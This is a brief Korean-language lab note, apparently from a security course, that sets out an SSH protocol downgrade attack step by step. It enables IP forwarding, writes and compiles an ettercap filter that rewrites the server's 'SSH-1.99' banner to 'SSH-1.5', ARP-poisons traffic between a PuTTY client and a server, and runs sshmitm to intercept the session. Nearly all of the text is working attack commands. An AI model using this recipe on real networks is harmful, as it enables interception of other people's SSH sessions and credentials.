SSH Downgrade Attack - Note

================================================

A client  (putty가 있는 xp)

Putty.exe 실행 --> SSH를 이용 192.168.30.192(server 접속)

=================================================

공격자 셋팅

1. 첫번째 터미널

 #echo "1" > /proc/sys/net/ipv4/ip_forward

 #cat /proc/sys/net/ipv4/ip_forward  (반드시 1로 셋팅되어야 한다.)

2. 두번째 터미널

 #cat > sshdown.ecf

 if ( search(DATA.data, "SSH-1.99") )

 {

  replace("SSH-1.99","SSH-1.5");

 }

 (ctrl + d 를 동시에 눌러 저장)

 #etterfilter -o sshdown.ef sshdown.ecf

 #ettercap -T -M arp -F sshdown.ef /192.168.30.30/ /192.168.30.192/

3. 세번째 터미널

 #sshmitm -d -I -p 22 192.168.30.192

=================================================